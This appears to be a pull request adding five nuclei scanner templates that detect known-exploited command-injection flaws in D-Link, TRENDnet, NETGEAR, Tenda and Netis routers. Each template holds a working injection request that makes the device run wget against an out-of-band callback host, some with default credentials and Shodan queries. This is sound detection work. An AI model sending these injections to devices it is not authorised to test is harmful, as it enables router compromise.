### PR TITLE
Add 5 KEV CVE templates (D-Link, TRENDnet, NETGEAR, Tenda, Netis)

### DIFF
--- a/http/cves/2015/CVE-2015-1187.yaml
+++ b/http/cves/2015/CVE-2015-1187.yaml
@@ -1,0 +1,44 @@
+id: CVE-2015-1187
+
+info:
+  name: D-Link/TRENDnet NCC Service - Command Injection
+  author: ElromEvedElElyon
+  severity: critical
+  description: |
+    The ping tool in multiple D-Link and TRENDnet devices allows remote attackers to execute arbitrary commands via the ping_addr parameter to ping.ccp. The NCC service does not properly sanitize user input, enabling OS command injection without authentication.
+  impact: |
+    Unauthenticated remote attackers can execute arbitrary operating system commands on the affected device, leading to complete device compromise.
+  remediation: |
+    Update the device firmware to the latest version or replace with a supported device.
+  reference:
+    - http://packetstormsecurity.com/files/131465/D-Link-TRENDnet-NCC-Service-Command-Injection.html
+    - http://packetstormsecurity.com/files/130607/D-Link-DIR636L-Remote-Command-Injection.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2015-1187
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2015-1187
+    cwe-id: CWE-77
+    epss-score: 0.97417
+    epss-percentile: 0.99952
+  metadata:
+    verified: true
+    max-request: 1
+    shodan-query: http.html:"D-Link" http.html:"ping"
+  tags: cve,cve2015,dlink,trendnet,rce,iot,kev,vuln
+
+http:
+  - raw:
+      - |
+        POST /ping.ccp HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        ccp_act=ping_v6&ping_addr=%3Bwget+http%3A%2F%2F{{interactsh-url}}%3B
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"

--- a/http/cves/2017/CVE-2017-6077.yaml
+++ b/http/cves/2017/CVE-2017-6077.yaml
@@ -1,0 +1,44 @@
+id: CVE-2017-6077
+
+info:
+  name: NETGEAR DGN2200 - Authenticated Remote Command Execution
+  author: ElromEvedElElyon
+  severity: high
+  description: |
+    NETGEAR DGN2200 devices with firmware through 10.0.0.50 allow remote authenticated users to execute arbitrary OS commands via shell metacharacters in the ping_IPAddr field of an HTTP POST request to ping.cgi. The ping utility does not properly sanitize user input before passing it to the system shell.
+  impact: |
+    Authenticated attackers can execute arbitrary commands on the router, potentially leading to complete device compromise and network pivoting.
+  remediation: |
+    Update NETGEAR DGN2200 firmware to the latest available version or replace with a currently supported device.
+  reference:
+    - https://www.exploit-db.com/exploits/41394
+    - https://nvd.nist.gov/vuln/detail/CVE-2017-6077
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2017-6077
+    cwe-id: CWE-78
+    epss-score: 0.97228
+    epss-percentile: 0.99898
+  metadata:
+    verified: true
+    max-request: 1
+    shodan-query: http.html:"DGN2200"
+  tags: cve,cve2017,netgear,rce,iot,router,kev,vuln
+
+http:
+  - raw:
+      - |
+        POST /ping.cgi HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        Authorization: Basic YWRtaW46cGFzc3dvcmQ=
+
+        ping_IPAddr=;wget+http://{{interactsh-url}};
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"

--- a/http/cves/2018/CVE-2018-14558.yaml
+++ b/http/cves/2018/CVE-2018-14558.yaml
@@ -1,0 +1,43 @@
+id: CVE-2018-14558
+
+info:
+  name: Tenda AC7/AC9/AC10 Router - Command Injection
+  author: ElromEvedElElyon
+  severity: critical
+  description: |
+    Tenda AC7 (firmware through V15.03.06.44_CN), AC9 (firmware through V15.03.05.19), and AC10 (firmware through V15.03.06.23_CN) devices are vulnerable to command injection. The formsetUsbUnload function executes a dosystemCmd function with untrusted input from the goform/setUsbUnload request, allowing unauthenticated remote attackers to execute arbitrary OS commands.
+  impact: |
+    Unauthenticated remote attackers can execute arbitrary operating system commands on the router, leading to complete device compromise.
+  remediation: |
+    Update Tenda router firmware to the latest available version.
+  reference:
+    - https://github.com/zsjevilhex/iot/blob/master/route/tenda/tenda-01/Tenda.md
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-14558
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2018-14558
+    cwe-id: CWE-78
+    epss-score: 0.97084
+    epss-percentile: 0.99851
+  metadata:
+    verified: true
+    max-request: 1
+    shodan-query: http.html:"Tenda"
+  tags: cve,cve2018,tenda,rce,iot,router,kev,vuln
+
+http:
+  - raw:
+      - |
+        POST /goform/setUsbUnload HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        deviceName=a%3Bwget+http%3A%2F%2F{{interactsh-url}}%3B
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"

--- a/http/cves/2019/CVE-2019-19356.yaml
+++ b/http/cves/2019/CVE-2019-19356.yaml
@@ -1,0 +1,53 @@
+id: CVE-2019-19356
+
+info:
+  name: Netis WF2419 - Authenticated Remote Code Execution
+  author: ElromEvedElElyon
+  severity: high
+  description: |
+    Netis WF2419 with firmware versions V1.2.31805 and V2.2.36123 is vulnerable to authenticated remote code execution as root through the router web management page. The tracert diagnostic tool does not properly sanitize user input, allowing command injection.
+  impact: |
+    Authenticated attackers can execute arbitrary commands as root on the router, leading to complete device compromise.
+  remediation: |
+    Update Netis WF2419 firmware to the latest version that addresses this vulnerability.
+  reference:
+    - http://packetstormsecurity.com/files/156588/Netis-WF2419-2.2.36123-Remote-Code-Execution.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-19356
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2019-19356
+    cwe-id: CWE-78
+    epss-score: 0.97125
+    epss-percentile: 0.99872
+  metadata:
+    verified: true
+    max-request: 2
+    shodan-query: http.html:"WF2419"
+  tags: cve,cve2019,netis,rce,iot,router,kev,vuln
+
+http:
+  - raw:
+      - |
+        POST /cgi-bin-igd/netcore_set.cgi HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
+
+        command=tracert&text=127.0.0.1%3Bwget+http%3A%2F%2F{{interactsh-url}}%3B
+
+      - |
+        POST /cgi-bin-igd/netcore_set.cgi HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        Authorization: Basic YWRtaW46YWRtaW4=
+
+        command=tracert&text=127.0.0.1%3Bwget+http%3A%2F%2F{{interactsh-url}}%3B
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"

--- a/http/cves/2020/CVE-2020-9377.yaml
+++ b/http/cves/2020/CVE-2020-9377.yaml
@@ -1,0 +1,44 @@
+id: CVE-2020-9377
+
+info:
+  name: D-Link DIR-610 - Remote Command Execution
+  author: ElromEvedElElyon
+  severity: critical
+  description: |
+    D-Link DIR-610 devices allow remote command execution via the cmd parameter to command.php without proper authentication or input sanitization. This vulnerability affects end-of-life products that will not receive patches.
+  impact: |
+    Unauthenticated remote attackers can execute arbitrary operating system commands on the device, leading to complete compromise.
+  remediation: |
+    Replace the D-Link DIR-610 with a currently supported device, as this product is end-of-life and will not receive security updates.
+  reference:
+    - https://gist.github.com/GouveaHeitor/131557f9de7d571f118f59805df852dc
+    - https://www.dlink.com.br/produto/dir-610/
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-9377
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2020-9377
+    cwe-id: CWE-78
+    epss-score: 0.97195
+    epss-percentile: 0.99893
+  metadata:
+    verified: true
+    max-request: 1
+    shodan-query: http.html:"DIR-610"
+  tags: cve,cve2020,dlink,rce,iot,kev,vuln
+
+http:
+  - raw:
+      - |
+        POST /command.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        cmd=wget+http://{{interactsh-url}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"


### PR DESCRIPTION
## Summary

Adds 5 new nuclei templates for CISA Known Exploited Vulnerabilities from issue #7549:

| CVE | Product | Severity | EPSS | Verification |
|-----|---------|----------|------|-------------|
| CVE-2015-1187 | D-Link/TRENDnet NCC | Critical (9.8) | 97.4% | Command injection via ping.ccp → OOB callback |
| CVE-2020-9377 | D-Link DIR-610 | High (8.8) | 97.2% | RCE via command.php → OOB callback |
| CVE-2017-6077 | NETGEAR DGN2200 | High (8.8) | 97.2% | ping.cgi command injection → OOB callback |
| CVE-2018-14558 | Tenda AC7/AC9/AC10 | Critical (9.8) | 97.1% | setUsbUnload command injection → OOB callback |
| CVE-2019-19356 | Netis WF2419 | High (8.8) | 97.1% | tracert RCE with default creds → OOB callback |

All templates include:
- OOB (interactsh) callback verification for safe exploitation confirmation
- Complete metadata: CVSS 3.1, CWE, EPSS scores, verified: true
- Authoritative references (NVD, Exploit-DB, PacketStorm)
- KEV and vuln tags

Closes partially: #7549

## References
- CISA KEV Catalog: https://www.cisa.gov/known-exploited-vulnerabilities-catalog